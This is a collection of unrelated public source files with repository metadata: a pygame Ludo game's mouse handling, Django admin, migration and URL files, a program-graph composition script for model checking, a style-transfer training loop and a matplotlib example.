self.game.menu.four_player_color = self.settings.BLACK
elif event_type == pygame.MOUSEBUTTONDOWN and self.game.menu.is_2nd_menu:
state_of_buttons = pygame.mouse.get_pressed()
if state_of_buttons[0] == 1 and self.game.menu.player_2.collidepoint(self.mouse_pos):
self.game.menu.is_2nd_menu = False
self.game.player.no_of_players = 2
if state_of_buttons[0] == 1 and self.game.menu.player_3.collidepoint(self.mouse_pos):
self.game.menu.is_2nd_menu = False
self.game.player.no_of_players = 3
if state_of_buttons[0] == 1 and self.game.menu.player_4.collidepoint(self.mouse_pos):
self.game.menu.is_2nd_menu = False
self.game.player.no_of_players = 4
def check_mouse_third_menu_event(self, event_type):
if event_type == pygame.MOUSEMOTION and self.game.menu.is_3rd_menu:
self.mouse_pos = pygame.mouse.get_pos()
if self.game.menu.dwarf_rect.collidepoint(self.mouse_pos) and self.game.menu.selected_red:
self.game.menu.dwarf_surface.set_alpha(100)
self.game.menu.player_text = f"Select dwarf for player {self.game.player.current_player}"
elif self.game.menu.selected_red:
self.game.menu.dwarf_surface.set_alpha(255)
if self.game.menu.orc_rect.collidepoint(self.mouse_pos) and self.game.menu.selected_green:
self.game.menu.orc_surface.set_alpha(100)
self.game.menu.player_text = f"Select orc for player {self.game.player.current_player}"
elif self.game.menu.selected_green:
self.game.menu.orc_surface.set_alpha(255)
if self.game.menu.lycan_rect.collidepoint(self.mouse_pos) and self.game.menu.selected_blue:
self.game.menu.lycan_surface.set_alpha(100)
self.game.menu.player_text = f"Select lycan for player {self.game.player.current_player}"
elif self.game.menu.selected_blue:
self.game.menu.lycan_surface.set_alpha(255)
if self.game.menu.elf_rect.collidepoint(self.mouse_pos) and self.game.menu.selected_yellow:
self.game.menu.elf_surface.set_alpha(100)
self.game.menu.player_text = f"Select elf for player {self.game.player.current_player}"
elif self.game.menu.selected_yellow:
self.game.menu.elf_surface.set_alpha(255)
elif event_type == pygame.MOUSEBUTTONDOWN and self.game.menu.is_3rd_menu:
state_of_buttons = pygame.mouse.get_pressed()
if state_of_buttons[0] == 1 and self.game.menu.dwarf_rect.collidepoint(self.mouse_pos) and self.game.menu.selected_red:
self.game.menu.dwarf_surface.set_alpha(0)
self.game.player.color_for_player[self.game.menu.counter] = "red"
self.game.player.current_player += 1
self.game.menu.counter += 1
self.game.menu.selected_red = False
if state_of_buttons[0] == 1 and self.game.menu.orc_rect.collidepoint(self.mouse_pos) and self.game.menu.selected_green:
self.game.menu.orc_surface.set_alpha(0)
self.game.player.color_for_player[self.game.menu.counter] = "green"
self.game.player.current_player += 1
self.game.menu.counter += 1
self.game.menu.selected_green = False
if state_of_buttons[0] == 1 and self.game.menu.lycan_rect.collidepoint(self.mouse_pos) and self.game.menu.selected_blue:
self.game.menu.lycan_surface.set_alpha(0)
self.game.player.color_for_player[self.game.menu.counter] = "blue"
self.game.player.current_player += 1
self.game.menu.counter += 1
self.game.menu.selected_blue = False
if state_of_buttons[0] == 1 and self.game.menu.elf_rect.collidepoint(self.mouse_pos) and self.game.menu.selected_yellow:
self.game.menu.elf_surface.set_alpha(0)
self.game.player.color_for_player[self.game.menu.counter] = "yellow"
self.game.player.current_player += 1
self.game.menu.counter += 1
self.game.menu.selected_yellow = False
def check_mouse_board_menu_event(self, event_type):
"Uses buttons on the screen to play the game."
if event_type == pygame.MOUSEMOTION and self.game.menu.is_board_menu:
self.mouse_pos = pygame.mouse.get_pos()
if not self.game.menu.is_turn_skip:
if self.game.menu.rtd_button.collidepoint(self.mouse_pos):
self.game.menu.roll_the_dice_button_color = self.settings.DARK_RED
else:
self.game.menu.roll_the_dice_button_color = self.settings.WHITE
else:
if self.game.menu.okay_button.collidepoint(self.mouse_pos):
self.game.menu.okay_button_color = self.settings.DARK_RED
else:
self.game.menu.okay_button_color = self.settings.WHITE
elif event_type == pygame.MOUSEBUTTONDOWN and self.game.menu.is_board_menu:
state_of_buttons = pygame.mouse.get_pressed()
if state_of_buttons[0] == 1 and self.game.menu.rtd_button.collidepoint(self.mouse_pos) and not self.game.menu.is_turn_skip:
self.game.dice.roll_dice()
self.game.dice.show_dice()
self.game.dice.dice_reset()
elif state_of_buttons[0] == 1 and self.game.menu.okay_button.collidepoint(self.mouse_pos):
self.game.menu.skipped_turn_text = ""
self.game.menu.okay_button_color = self.settings.WHITE
self.game.menu.is_turn_skip = False
def choose_token_on_board_mouse_event(self):
"Lets you carry out an action on a token based on which one is chosen."
self.mouse_pos = pygame.mouse.get_pos()
state_of_buttons = pygame.mouse.get_pressed()
token_checker = 0
for self.token_selector, self.ludo_token in enumerate(self.game.player.current_player_token_group):
# This if condition is just to make sure the same dice value doesn't act on multiple tokens on the same spot
if token_checker == 1:
break
# checking to see if token is clicked on
if self.ludo_token.rect.collidepoint(self.mouse_pos) and state_of_buttons[0] == 1:
self.placeholder_sprite = self.game.player.current_player_placeholder_group[self.token_selector]
# This if statement checks if you clicked a token which is placed onto a placeholder (and only puts the token onto a starting tile)
if self.ludo_token.rect.x == self.placeholder_sprite.rect.x and self.ludo_token.rect.y == self.placeholder_sprite.rect.y:
if self.game.dice.dice_val < 6:
self.settings.draw_text("Sorry you cannot choose this token!", self.settings.MAIN_MENU_FONT_PATH, 20, self.settings.BLACK, self.settings.screen_center, self.game.dice.current_dice_rect.y + 5*self.settings.box_size, "n", True)
self.game.dice.current_turn = False
else:
self.game.player.current_player_on_start_path()
self.settings.draw_text(f"Player {self.game.player.current_player} chose their {self.token_selector + 1} token!", self.settings.MAIN_MENU_FONT_PATH, 15, self.game.dice.current_text_color, self.settings.screen_center, self.game.dice.current_dice_rect.y + 5*self.settings.box_size, "n", True)
# This else statement controls the movement for the tiles on the path (movement and winning tiles)
else:
self.movement_checker = self.game.dice.dice_val + self.game.player.token_movement_counter[self.game.player.current_player_color][self.token_selector]
if self.movement_checker < self.settings.total_movement_steps: # Move on the movement tiles if the winning tiles aren't reached
self.game.player.move_on_normal_path()
self.settings.draw_text(f"Player {self.game.player.current_player} chose their {self.game.player.current_player_color} token!", self.settings.MAIN_MENU_FONT_PATH, 15, self.game.dice.current_text_color, self.settings.screen_center, self.game.dice.current_dice_rect.y + 5*self.settings.box_size, "n", True)
else:
self.game.player.move_on_winning_path()
self.settings.draw_text(f"Player {self.game.player.current_player} chose their {self.game.player.current_player_color} token!", self.settings.MAIN_MENU_FONT_PATH, 15, self.game.dice.current_text_color, self.settings.screen_center, self.game.dice.current_dice_rect.y + 5*self.settings.box_size, "n", True)
token_checker += 1
self.game.board.draw_on_tiles = False # To ensure the highlighted tiles don't remain highlighted after turn has completed
self.game.draw_sprites()
pygame.display.flip()
time.sleep(1)
self.game.dice.current_turn = False # To end the turn for the current player
def highlight_token_on_board_mouse_event(self):
"This function takes care of all the path highlights based on the token that was hovered over."
self.mouse_pos = pygame.mouse.get_pos()
for token_selector, ludo_token in enumerate(self.game.player.current_player_token_group):
placeholder_sprite = self.game.player.current_player_placeholder_group[token_selector]
if not (ludo_token.rect.x == placeholder_sprite.rect.x and ludo_token.rect.y == placeholder_sprite.rect.y):
if ludo_token.rect.collidepoint(self.mouse_pos): # the mouse is hovering over the ludo token that is on the board and not in the base
current_token_position = self.game.player.token_movement_counter[self.game.player.current_player_color][token_selector] + 1 # we take the current token position and to exclude it, we add 1 to it
move_val = current_token_position + self.game.dice.dice_val # determines all the sprites that are to be highlighted
movement_path_indices = self.settings.total_movement_steps - current_token_position if current_token_position < self.settings.total_movement_steps else 0
winning_path_indices = move_val - self.settings.total_movement_steps if move_val > self.settings.total_movement_steps else 0
if movement_path_indices != 0 and winning_path_indices !=0: # This situation arises if a dice val arrives such that the tiles to move on include both the movement as well as the winning path tiles
movement_path_indices_of_tiles_to_highlight = self.game.player.team_path[self.game.player.current_player_color][current_token_position:current_token_position + movement_path_indices]
winning_path_indices_of_tiles_to_highlight = self.game.player.winning_path[self.game.player.current_player_color][:winning_path_indices]
self.game.board.path_highlight_sprites = [self.game.board.movement_path_sprites[indice] for indice in movement_path_indices_of_tiles_to_highlight]
self.game.board.path_highlight_sprites += [self.game.board.winning_path_dict[self.game.player.current_player_color][indice] for indice in winning_path_indices_of_tiles_to_highlight]
elif movement_path_indices != 0: # Highlights only the movement path tiles
movement_path_indices_of_tiles_to_highlight = self.game.player.team_path[self.game.player.current_player_color][current_token_position:move_val]
self.game.board.path_highlight_sprites = [self.game.board.movement_path_sprites[indice] for indice in movement_path_indices_of_tiles_to_highlight]
elif winning_path_indices != 0: # Highlights only the winning path tiles
current_winning_path_position = current_token_position - self.settings.total_movement_steps # Current position of token on winning path
winning_move_val = (current_token_position + self.game.dice.dice_val) - self.settings.total_movement_steps
if not winning_move_val > (self.settings.winning_path_threshold - self.settings.total_movement_steps + 1): # The 1 added to the winning path threshold is just to ensure the last token gets highlighted given the dice value isnt too large
winning_path_indices_of_tiles_to_highlight = self.game.player.winning_path[self.game.player.current_player_color][current_winning_path_position:winning_move_val]
self.game.board.path_highlight_sprites = [self.game.board.winning_path_dict[self.game.player.current_player_color][indice] for indice in winning_path_indices_of_tiles_to_highlight]
else:
self.game.board.path_highlight_sprites = [] # This statement is just to ensure the tiles don't highlight on winning path if it goes beyond the winning path tiles
self.game.board.draw_on_tiles = False
return
self.game.board.draw_on_tiles = True
def check_keyboard_final_menu_event(self):
if self.game.menu.is_final_menu:
self.game.menu.is_final_menu = False
| [
"noreply@github.com"
] | noreply@github.com |
24f91adc550d123a98239a57ae27ac6345f382ab | cd44f9f6d97e54886352353da9c45d9e6c291928 | /newspaper/admin.py | d347faa1a852e2b8fbe3b1fd52357e2b88adaebb | [] | no_license | MaksimFelchuck/Felnews | c480f045dc21d6f40e10d233a011fb05522f53f9 | a3411f10230b7cecdac4a49cb7e83c03d1c89444 | refs/heads/master | 2023-02-17T08:13:21.413801 | 2021-01-16T14:55:03 | 2021-01-16T14:55:03 | 330,102,149 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 171 | py | from django.contrib import admin
from newspaper.models import *
# Register your models here.
@admin.register(News, Image)
class PersonAdmin(admin.ModelAdmin):
pass
| [
"felchuck@yandex.ru"
] | felchuck@yandex.ru |
f8e650b4108f33a5a304944caf20ee25f045cba5 | 8747375a4c6442a5bc317baad36ba41f5de4512e | /personal/migrations/0007_auto_20150226_0351.py | ca2beb584b49a1f858048462ec0f5e23cf67c068 | [] | no_license | raultr/perBackend | 40f73199cb722133d79d76b4389d4f613764560b | f22542f79f293de444e29ac7183a0ee9c5b86889 | refs/heads/master | 2022-12-06T10:17:29.400434 | 2017-02-14T03:23:13 | 2017-02-14T03:23:13 | 30,055,264 | 0 | 0 | null | 2022-11-22T00:26:36 | 2015-01-30T03:57:03 | JavaScript | UTF-8 | Python | false | false | 888 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('personal', '0006_personal_imagen'),
]
operations = [
migrations.AlterField(
model_name='personal',
name='condiciones_alta',
field=models.CharField(default=b'', max_length=150, blank=True),
preserve_default=True,
),
migrations.AlterField(
model_name='personal',
name='cuip',
field=models.CharField(max_length=30, blank=True),
preserve_default=True,
),
migrations.AlterField(
model_name='personal',
name='id_seguridad_social',
field=models.CharField(max_length=20, blank=True),
preserve_default=True,
),
]
| [
"raultr@gmail.com"
] | raultr@gmail.com |
0fe9e8dc03af0dfdeae514c6ac4eaa9dce57b024 | c26b3e6df5cbe0f0d40afa675b5e468e939c3672 | /test3.py | 247dd9d5b65c25082aef0ded04a74865a4f651c0 | [] | no_license | TianchiLiu/ModelChecking-1 | 27c78aa1739988f70e3bfb82fc128650e16dddd8 | 38372f6e9f74f30cfe508987706ebf2a5100f4bc | refs/heads/master | 2021-08-09T15:38:16.103196 | 2017-11-12T08:33:05 | 2017-11-12T08:33:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,943 | py | import itertools
import re
f=open('/home/kiroscarlet/ModelChecking/pg1.txt','r')#改成自己的文件夹
Loc1=re.findall(r"{(.+?)}",f.readline())[0].split(",")
# 用正则匹配截取左右大括号中的内容,以逗号为间隔分割成列表
print(Loc1)
Loc01=re.findall(r"{(.+?)}",f.readline())[0].split(",")
print(Loc01)
Var1=re.findall(r"{(.+?)}",f.readline())[0].split(",")
print(Var1)
var1=Var1[:]
print(var1)
for i in range(len(var1)):
var1[i]=re.findall(r"{(.+?)}",f.readline())[0].split(",")
for i in range(len(var1)):
for j in range(len(var1[i])):
var1[i][j] = int(var1[i][j])
print(var1)
print(Var1)
Act1=re.findall(r"{(.+?)}",f.readline())[0].split(",")
print(Act1)
g01=re.findall(r"{(.+?)}",f.readline())[0].split(",")
print(g01)
t1=[]
#t数组是一个状态转换的四元组
f.readline()
while True:
line=f.readline()
if re.findall("Effect", line):
break
t1.append(re.findall("\((.+?)\)",line)[0].split(","))
def effectRead(f,Effect):
while True:
line = f.readline()
if line =='':
break
Effect.append(line)
Effect[-1]=Effect[-1][:-3]
Effect1=[]
effectRead(f,Effect1)
print(Effect1)
f.close()
print(t1)
f=open('/home/kiroscarlet/ModelChecking/pg2.txt','r')#改成自己的文件夹
Loc2=re.findall(r"{(.+?)}",f.readline())[0].split(",")
# 用正则匹配截取左右大括号中的内容,以逗号为间隔分割成列表
print(Loc2)
Loc02=re.findall(r"{(.+?)}",f.readline())[0].split(",")
print(Loc02)
Var2=re.findall(r"{(.+?)}",f.readline())[0].split(",")
print(Var2)
var2=Var2[:]
print(var2)
for i in range(len(var2)):
var2[i]=re.findall(r"{(.+?)}",f.readline())[0].split(",")
for i in range(len(var2)):
for j in range(len(var2[i])):
var2[i][j] = int(var2[i][j])
print(var2)
print(Var2)
Act2=re.findall(r"{(.+?)}",f.readline())[0].split(",")
print(Act2)
g02=re.findall(r"{(.+?)}",f.readline())[0].split(",")
print(g02)
t2=[]
#t数组是一个状态转换的四元组
f.readline()
while True:
line=f.readline()
if re.findall("Effect", line):
break
t2.append(re.findall("\((.+?)\)",line)[0].split(","))
Effect2=[]
effectRead(f,Effect2)
print(Effect2)
f.close()
print(t2)
def Cartesian(list1,list2):
list=[]
for i in list1:
for j in list2:
list.append(i+'_'+j)
return list
def write_list(list,f):
f.write('{')
for i in list[0:-1]:
j=str(i)
f.write(j+',')
f.write(str(list[-1])+'}\n')
Loc=Cartesian(Loc1,Loc2)
print(Loc)
Loc0=Cartesian(Loc01,Loc02)
print(Loc0)
f=open('/home/kiroscarlet/ModelChecking/pg1andpg2.txt','w')
f.write('Loc=')
write_list(Loc,f)
f.write('Loc0=')
write_list(Loc0,f)
def varMerge(Var,Var1,Var2,var,var1,var2):
i=j=0
while i<len(Var1) and j<len(Var2):
Var.append(Var1[i])
var.append(var1[i])
if Var1[i]!= Var2[j]:
Var.append(Var2[j])
var.append(var2[j])
i=i+1
j=j+1
Var=[]
var=[]
varMerge(Var,Var1,Var2,var,var1,var2)
print(var)
f.write('Var=')
write_list(Var,f)
for i in range(len(Var)):
f.write(Var[i]+'=')
write_list(var[i],f)
print(var)
Act=Act1+Act2
print(Act)
f.write('Act=')
write_list(Act,f)
g0=[]
g0.append('('+g01[0]+')'+' and '+'('+g02[0]+')')
f.write('g0=')
write_list(g0,f)
f.write('Translation\n')
t=[]
def transtationMerge(t,t1,t2):
for i in t1:
for j in t2:
temp=i[:]
temp[0]=i[0]+'_'+j[0]
temp[3]=i[3]+'_'+j[0]
t.append(temp)
for i in t2:
for j in t1:
temp = i[:]
temp[0] = j[0] + '_' + i[0]
temp[3] = j[0] + '_' + i[3]
t.append(temp)
t=[]
transtationMerge(t,t1,t2)
print(t)
for i in t:
f.write(r' (')
for j in i[0:-1]:
f.write(str(j)+',')
f.write(str(i[-1])+')\n')
f.write('Effect\n')
Effect=Effect1+Effect2
print(Effect)
for i in Effect:
f.write(i)
| [
"1277836029@qq.com"
] | 1277836029@qq.com |
9d11cd4b5864d8bfb62d272e97077989d61f7c84 | 6f73053e9c5a8bb40f34dd12a9a000ad3ca84f1f | /exchange/core/entities/__init__.py | ea1a17b054ed4a7f887d52c46eed80386fa3aeab | [] | no_license | Bizilizi/python-crypto-exchange | 9610857580b5c0239a9cbd778246c65e693a8d31 | 9eef1641e8cc04a7b3922447b05c04e37268187b | refs/heads/master | 2022-12-01T14:28:28.819215 | 2020-08-14T06:26:37 | 2020-08-14T06:26:37 | 287,306,992 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 318 | py | from .account import Account
from .balance import (
BalanceRecord,
PairBalance,
)
from .fee import Fee
from .order_book import Order, OrderBook
from .symbol_pair import SymbolPair
__all__ = [
"Account",
"BalanceRecord",
"PairBalance",
"Fee",
"Order",
"OrderBook",
"SymbolPair",
]
| [
"ewriji@airlab.team"
] | ewriji@airlab.team |
257a852010c6ac198207acb56d1e5dcc5f9a136c | ba31ca99cd83d263952a3ab949cec21bec9831dd | /CollectionsOverview/tuple&namedtuple/tuple&namedtuple.py | 22667d869d07c6380683598637a5d390a90043f2 | [] | no_license | YizhuZhan/python-study | dd4f492c4a5b2b1bebcbd463380c57c1f6594a69 | 49bed4935e6d4bd1bdfd5f7159cc0e1c783e5764 | refs/heads/master | 2020-03-29T04:54:32.850829 | 2018-10-23T03:39:33 | 2018-10-23T03:39:33 | 149,554,810 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,972 | py | # -*-coding=utf-8 -*-
__author__ = 'Ivana'
from collections import namedtuple
# 抽象基类 interface
# from collections.abc import *
from collections import namedtuple
user_tuple = ('Ivana', 27, 167)
name, age, height = user_tuple
print(name, age, height)
name, *others = user_tuple
print(name, others)
user_info_dict = {}
user_info_dict[user_tuple] = 'programmer'
print(user_info_dict)
# namedtuple可以直接用于对接数据库读取结果
User = namedtuple("User", ["name", "age", "height"])
user1 = User("Ivana", 27, 167)
print(user1.name, user1.age, user1.height)
# namedtuple既可以按照字段名访问属性,也可以按照位置访问,从0开始
print(user1[0], user1[1], user1[2])
# 可以
print(user1)
# 取出数据库表user中的全部数据,并加入一列edu,使用namedtuple的user对象增加"edu"后可以直接对接数据库存入
# 单*参数
User = namedtuple("User", ["name", "age", "height", "edu"])
user_tuple = ("Ivana", 27, 167)
user2 = User(*user_tuple, "master")
print(user2.name, user2.age, user2.height, user2.edu)
# 双*参数
User = namedtuple("User", ["name", "age", "height", "edu"])
user_dict = {"name": "sql", "age": 27, "height": 178}
user3 = User(**user_dict, edu="master")
print(user3.name, user3.age, user3.height, user3.edu)
# 用namedtuple生成的类,实例化得到的对象实体支持拆包特性,而普通类对象不支持
name, age, *others = user3
print(name, age, others)
# namedtuple中的_asdict()方法:可将tuple转换成dict,并返回一个OrderdDict类的对象
d2 = user2._asdict()
print(d2)
userd2 = User(**d2)
print(userd2.name, userd2.age, userd2.height, userd2.edu)
# _make()方法放iteirable参数,但灵活性不高
try:
user4 = User._make(['zyz', 18, 165])
except Exception as e:
print(e.args) # Expected 4 arguments, got 3
user4 = User._make(['zyz', 18, 165, "master"])
finally:
print(user4) # User(name='zyz', age=18, height=165, edu='master') | [
"zhyzh910914@126.com"
] | zhyzh910914@126.com |
058eed73a68232a87c8199303860ed5deb0c7b42 | 08093753140a6a32e37799e45021fe7905f72b2a | /ib-all-factors.py | 39e9274a22e341856b6dc0dc0c4141f44d9853aa | [] | no_license | ShivendraAgrawal/coding_2016 | 6aa503b4b3ffbe14aca086e64661f608b136832f | 2a973860acfdbcec55dd180aa4a08384d97a78d7 | refs/heads/master | 2020-05-22T09:17:42.641422 | 2016-08-01T10:56:08 | 2016-08-01T10:56:08 | 49,042,801 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 623 | py | class Solution:
# @param A : integer
# @return a list of integers
def allFactors(self, A):
result = []
stop = int((A**(0.5)) // 1) + 1
print(stop)
for i in range(1,stop):
if A%i == 0:
result.append(i)
result.append(A//i)
result = list(set(result))
return sorted(result)
def isPrime(self, A):
if A == 1:
return 0
stop = int((A**(0.5)) // 1) + 1
for i in range(2,stop):
if A%i == 0:
return 0
return 1
A = 18
s = Solution()
print(s.isPrime(A)) | [
"shivendra.agrawal@gmail.com"
] | shivendra.agrawal@gmail.com |
3f1d716a0e6f5b1bb216b80ae844859e1cb0e536 | 31072bce3e3279f831dea880873adce58c84fdc4 | /blog/urls.py | c678fd4a28abd9883ddbbc078f6f8dd0ffa91bca | [] | no_license | 100sarthak100/Python_Django_Blog | 00eeb475602d8beee79b9b7fc70a8b42e39becfb | 842a0b5b91200c61119f3ee16ced3bd61cf1b66b | refs/heads/master | 2022-12-05T04:38:41.300348 | 2019-12-24T04:01:44 | 2019-12-24T04:01:44 | 228,986,653 | 1 | 0 | null | 2022-11-22T04:55:08 | 2019-12-19T06:06:25 | JavaScript | UTF-8 | Python | false | false | 1,085 | py | from django.urls import path,include
from .views import (
PostListView,
PostDetailView,
PostCreateView,
PostUpdateView,
PostDeleteView,
UserPostListView,
)
from . import views
urlpatterns = [
#path('api/blog/', include('blog.api.urls'), name='blog-api'),
path('comment/<int:pk>/approve/', views.comment_approve, name='comment_approve'),
path('comment/<int:pk>/remove/', views.comment_remove, name='comment_remove'),
path('post/<int:pk>/comment/', views.add_comment_to_post, name='add_comment_to_post'),
path('tinymce/', include('tinymce.urls')),
path('', PostListView.as_view(), name='blog-home'),
path('user/<str:username>', UserPostListView.as_view(), name='user-posts'),
path('post/<int:pk>/', PostDetailView.as_view(), name='post-detail'),
path('post/new/', PostCreateView.as_view(), name='post-create'),
path('post/<int:pk>/update/', PostUpdateView.as_view(), name='post-update'),
path('post/<int:pk>/delete/', PostDeleteView.as_view(), name='post-delete'),
path('about/', views.about, name='blog-about'),
] | [
"sarthaknaithani127@gmail.com"
] | sarthaknaithani127@gmail.com |
f7a595ddeaf0589237edbce2280478c40f9f06a1 | 475a4cfa6cf4d4e6d05a6497a4012ae98e171bb9 | /organization/utils.py | 647b0150c76f692479decd36a4ca5f17fdf05ea3 | [
"BSD-3-Clause"
] | permissive | fredpalmer/patt3rns | 926516c01ed69b2a48406d82578f670554fd8b8c | 3faac2b583d45c8bf9cc8fe9ad5b5009ee7ed538 | refs/heads/develop | 2021-01-01T16:49:23.990749 | 2015-09-28T16:05:26 | 2015-09-28T16:05:26 | 26,644,658 | 0 | 0 | null | 2015-09-28T16:05:26 | 2014-11-14T15:31:58 | Python | UTF-8 | Python | false | false | 156 | py | """
Utility helpers for organization module
"""
# coding=utf-8
from __future__ import unicode_literals
import logging
logger = logging.getLogger(__name__)
| [
"fred.palmer@gmail.com"
] | fred.palmer@gmail.com |
ad43c4e662b812eeb2e0f193cfd48753329f760c | 456345882451054ec5c0841886746f0dfd858094 | /ProblemSet2/PS2-3.py | 21f963d00c0906b6ae3b6fdbb1279099353743d5 | [] | no_license | makthrow/6.00x | faf5241008b1b57760a2e3411bf7fe637488a8fd | 7480be3634f5442c05bc9c838ab90ca80cd57ecc | refs/heads/master | 2021-01-10T21:49:31.302625 | 2013-05-21T18:04:14 | 2013-05-21T18:04:14 | 10,201,987 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,660 | py | """
Monthly interest rate = (Annual interest rate) / 12
Monthly payment lower bound = Balance / 12
Monthly payment upper bound = (Balance x (1 + Monthly interest rate)^12) / 12
"""
#Test Case 1:
balance = 320000
annualInterestRate = 0.2
# Lowest Payment: 29157.09
monthlyInterestRate = annualInterestRate / 12
lowerBound = balance / 12
upperBound = (balance * (1 + monthlyInterestRate) ** 12) / 12
updatedBalance = balance
def remainingBalance(fixedMonthlyPayment):
updatedBalance = balance
month = 1
while month <= 12:
updatedBalance = (updatedBalance - fixedMonthlyPayment) * (1 + monthlyInterestRate)
month += 1
return updatedBalance
def balancePaidInFull(updatedBalance):
return updatedBalance <= 0
def binarySortToLowerBound():
global lowerBound
global upperBound
epsilon = 0.01
while abs(upperBound - lowerBound) > epsilon:
fixedMonthlyPayment = (lowerBound + upperBound) / 2
updatedBalance = remainingBalance(fixedMonthlyPayment)
if updatedBalance == 0:
return fixedMonthlyPayment
if updatedBalance > 0:
lowerBound = fixedMonthlyPayment
else:
upperBound = fixedMonthlyPayment
print (upperBound - fixedMonthlyPayment)
print "lowerBound: %f" % lowerBound
return lowerBound
fixedMonthlyPayment = binarySortToLowerBound()
while not balancePaidInFull(updatedBalance):
fixedMonthlyPayment += 0.01
updatedBalance = remainingBalance(fixedMonthlyPayment)
#print updatedBalance
#print remainingBalance(29157.09)
print "Lowest Payment: %.2f" % fixedMonthlyPayment
| [
"alanjaw@gmail.com"
] | alanjaw@gmail.com |
f679cfe49a5a9682024f0cc2f559fdb8e4f7a420 | d76f864ec1ddc0ad40461b2c7283caac113d1a94 | /borrowers/manage.py | 7dc3700feea2035b1da3ec350ff7d0faee9ed167 | [] | no_license | ecarlos09/roselyn-elwin-library-2 | 13b0b60fecc8bd6722b70f775b62648a0dc8753a | 3e64c298aa42827cf0ba7b6d2a20884efb19e405 | refs/heads/main | 2023-04-19T21:38:04.061450 | 2021-05-09T11:31:37 | 2021-05-09T11:31:37 | 365,148,235 | 0 | 1 | null | 2021-05-09T11:09:15 | 2021-05-07T07:18:57 | Python | UTF-8 | Python | false | false | 665 | py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
"""Run administrative tasks."""
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'borrowers.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| [
"elwin.carlos09@gmail.com"
] | elwin.carlos09@gmail.com |
faa46e3e7481d5bbafc9aef63a7b6099bf197c4b | cd5cbfb88794c10490e70ca5a06915cd351db6f9 | /train.py | 471dcbaf815d14ef26eaa181965336897abf4ff8 | [
"LicenseRef-scancode-unknown-license-reference",
"BSD-3-Clause",
"BSD-2-Clause"
] | permissive | TrendingTechnology/conditional-style-transfer | 813d1b57a804dc621da30e6bb3a5e82875eb9354 | fcdc4716f98e333ef19f9d45be880d0837151cd2 | refs/heads/master | 2022-12-18T10:57:00.258679 | 2020-09-29T09:20:55 | 2020-09-29T09:20:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,121 | py | import time
from options.train_options import TrainOptions
from data import CreateDataLoader, CreateStyleDataLoader
from models import create_model
from util.visualizer import Visualizer
import torch
if __name__ == '__main__':
opt = TrainOptions().parse()
data_loader = CreateDataLoader(opt)
dataset = data_loader.load_data()
dataset_size = len(data_loader)
print('#training images = %d' % dataset_size)
model = create_model(opt)
model.setup(opt)
visualizer = Visualizer(opt)
total_steps = 0
#torch.autograd.set_detect_anomaly(True)
for epoch in range(opt.epoch_count, opt.niter + opt.niter_decay + 1):
epoch_start_time = time.time()
iter_data_time = time.time()
epoch_iter = 0
for i, data in enumerate(dataset):
iter_start_time = time.time()
if total_steps % opt.print_freq == 0:
t_data = iter_start_time - iter_data_time
visualizer.reset()
total_steps += opt.batch_size
epoch_iter += opt.batch_size
# Get next style samples and add them to the data
data['A_style'] = torch.reshape(data['A_style'], [data['A_style'].shape[0] * data['A_style'].shape[1], data['A_style'].shape[2], data['A_style'].shape[3], data['A_style'].shape[4]])
data['B_style'] = torch.reshape(data['B_style'], [data['B_style'].shape[0] * data['B_style'].shape[1], data['B_style'].shape[2], data['B_style'].shape[3], data['B_style'].shape[4]])
data['C_style'] = torch.reshape(data['C_style'], [data['C_style'].shape[0] * data['C_style'].shape[1], data['C_style'].shape[2], data['C_style'].shape[3], data['C_style'].shape[4]])
model.set_input(data)
model.optimize_parameters()
if total_steps % opt.display_freq == 0:
save_result = total_steps % opt.update_html_freq == 0
visualizer.display_current_results(model.get_current_visuals(), epoch, save_result)
if total_steps % opt.print_freq == 0:
losses = model.get_current_losses()
t = (time.time() - iter_start_time) / opt.batch_size
visualizer.print_current_losses(epoch, epoch_iter, losses, t, t_data)
if opt.display_id > 0:
visualizer.plot_current_losses(epoch, float(epoch_iter) / dataset_size, opt, losses)
if total_steps % opt.save_latest_freq == 0:
print('saving the latest model (epoch %d, total_steps %d)' %
(epoch, total_steps))
model.save_networks('latest')
iter_data_time = time.time()
if epoch % opt.save_epoch_freq == 0:
print('saving the model at the end of epoch %d, iters %d' %
(epoch, total_steps))
model.save_networks('latest')
model.save_networks(epoch)
print('End of epoch %d / %d \t Time Taken: %d sec' %
(epoch, opt.niter + opt.niter_decay, time.time() - epoch_start_time))
model.update_learning_rate()
| [
"vojtech@nnaisense.com"
] | vojtech@nnaisense.com |
c7256ce38afd60cd7ed3c1b4dd80ff0d00783c55 | 65e3c1f2911de516bd89e68ba1da5a73bd70d16c | /Matplotlib/pyplot_tutorial_4.py | df09e2ac45af7bf54d3704d0aaaccd65242b4596 | [] | no_license | PiotrKrolak/Python | 174a78e3aab08d6c77386a26b89d817018b82ef5 | 79589e8919049f35fe33ad93f0293eff8000b02d | refs/heads/master | 2020-04-04T08:03:02.476313 | 2019-04-19T18:02:31 | 2019-04-19T18:02:31 | 155,769,402 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 414 | py | #
# https://matplotlib.org/tutorials/introductory/pyplot.html#sphx-glr-tutorials-introductory-pyplot-py
import matplotlib.pyplot as plt
import numpy as np
def f(t):
return np.exp(-t) * np.cos(2*np.pi*t)
t1 = np.arange(0.0, 5.0, 0.1)
t2 = np.arange(0.0, 5.0, 0.02)
plt.figure(1)
plt.subplot(211)
plt.plot(t1, f(t1), 'bo', t2, f(t2), 'k')
plt.subplot(212)
plt.plot(t2, np.cos(2*np.pi*t2), 'r--')
plt.show()
| [
"krolak.piotr.lca@gmail.com"
] | krolak.piotr.lca@gmail.com |
